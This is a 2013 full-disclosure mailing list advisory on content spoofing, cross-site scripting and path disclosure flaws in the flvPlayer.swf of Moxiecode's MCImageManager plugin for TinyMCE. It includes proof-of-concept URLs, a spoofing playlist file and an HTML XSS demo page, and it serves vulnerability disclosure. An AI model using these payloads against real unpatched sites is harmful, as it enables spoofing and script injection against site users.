[<prev] [next>] [day] [month] [year] [list]
Message-ID: <006e01ce9b52$fe626d50$9b7a6fd5@pc>
Date: Sat, 17 Aug 2013 17:06:16 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>,
"1337 Exploit DataBase" <mr.inj3ct0r@...il.com>
Subject: CS,
XSS and FPD vulnerabilities in MCImageManager for TinyMCE
Hello list!
I want to warn you about vulnerabilities in Moxiecode Image Manager
(MCImageManager). This is commercial plugin for TinyMCE. It concerns as
MCImageManager, as all web applications which have MCImageManager in their
bundle.
These are Content Spoofing, Cross-Site Scripting and Full Path Disclosure
vulnerabilities. About Content Spoofing and Cross-Site Scripting
vulnerabilities in flvPlayer I informed developer already in October 2011
(it was part of Media plugin for TinyMCE) and disclosed them in November.
After my informing he fixed these holes in November 2011 in Media plugin.
But he forgot to fix them in MCImageManager plugin.
-------------------------
Affected products:
-------------------------
Vulnerable are Moxiecode Image Manager 3.1.5 and previous versions.
-------------------------
Affected vendors:
-------------------------
Moxiecode
http://www.moxiecode.com
----------
Details:
----------
Content Spoofing (WASC-12):
Flash-file flvPlayer.swf accepts arbitrary addresses in parameter flvToPlay
and startImage, which allows to spoof content of flash - i.e. by setting
addresses of video and/or image files from other site.
http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv
http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?autoStart=false&startImage=1.jpg
http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv&autoStart=false&startImage=1.jpg
Flash-file flvPlayer.swf accepts arbitrary addresses in parameter flvToPlay,
which allows to spoof content of flash - i.e. by setting address of playlist
file from other site (parameters thumbnail and url in xml-file accept
arbitrary addresses).
http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.xml
File 1.xml:
<?xml version="1.0" encoding="UTF-8"?>
<playlist>
<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
</playlist>
XSS (WASC-08):
If at the site at page with flvPlayer.swf (with parameter jsCallback=true,
or if there is possibility to set this parameter for flv_player.swf) there
is possibility to include JS code with function flvStart() and/or flvEnd()
(via HTML Injection), then it's possible to conduct XSS attack. I.e.
JS-callbacks can be used for XSS attack.
Example of exploit:
<html>
<body>
<script>
function flvStart() {
alert('XSS');
}
function flvEnd() {
alert('XSS');
}
</script>
<object width="50%" height="50%">
<param name=movie value="flvPlayer.swf">
<param name=quality value=high>
<embed src="flvPlayer.swf?flvToPlay=1.flv&jsCallback=true" width="50%"
height="50%" quality=high
pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"
type="application/x-shockwave-flash"></embed>
</object>
</body>
</html>
Full Path Disclosure (WASC-13):
Full path In cookies MCManager_im_lastPath and MCManagerHistoryCookie_im.
------------
Timeline:
------------
2011.10.20 - informed developer of flvPlayer.
2011.10.20 - informed developer of TinyMCE (which bundled with flvPlayer in
Media plugin).
2013.06.11 - announced at my site.
2013.06.13 - informed developer of MCImageManager.
2013.08.16 - disclosed at my site (http://websecurity.com.ua/6562/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists